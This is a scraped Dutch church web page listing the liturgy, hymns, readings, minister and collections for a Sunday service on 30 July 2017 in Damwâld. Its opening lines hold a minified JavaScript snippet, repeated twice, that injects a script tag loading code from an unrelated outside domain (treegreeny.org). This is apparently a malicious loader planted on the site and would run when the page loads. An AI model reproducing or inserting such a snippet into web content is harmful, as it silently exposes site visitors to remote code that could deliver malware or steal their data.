;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 30 juli 2017 9:30 uur - PKN Damwâld
zondag 30 juli 2017
09:30 uur

Kerkdienst zondag 30 juli 2017 9:30 uur

Thema: Een mens leeft niet van brood alleen

Informatie

Voorganger:Ds. Joh. Bakker, Stiens
Organist:Foeke Wiegersma
Thema:Een mens leeft niet van brood alleen
Liturgie
Lied voor de dienst Elb 422 : 1, 2, 3 en 4
Welkom en mededelingen
aanvangslied Ps 78 : 1 en 2
Stilgebed , Bemoediging en Groet .
Inleidingstekst Psalm 78:12-22
We zingen: Ps 78: 19 en 25
Gebod Nehemia 9:15-20
We zingen: Gez. 463 : 2
Gebed van verootmoediging en schuldbelijdenis .
We zingen: Gez. 463 :1
Woord van vergeving .
We zingen: Gez. 463 : 4
We lezen: Matteüs 14 : 13-21
We zingen: Gez. 349 : 1 en 2
Preek, Thema: Een mens leeft niet van brood alleen
We zingen: Gez. 57b : 1, 2, 3, 4 en 5
Dankgebed-Voorbedden-onze Vader
Collecte
Slotlied Elb 226 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Chr. ziekenhuis Itendey in Congo (Project 10 27)

Hulp bij het herstel van het Christelijk ziekenhuis in Iendey en ondersteuning van arme patiënten die zelf de medische zorg niet kunnen betalen. Verder wil project 10 27 financiële middelen beschikbaar stellen om het ziekenhuispersoneel toe te rusten voor hun taak

Tweede collecte: Kerk
Uitganscollecte: Kerk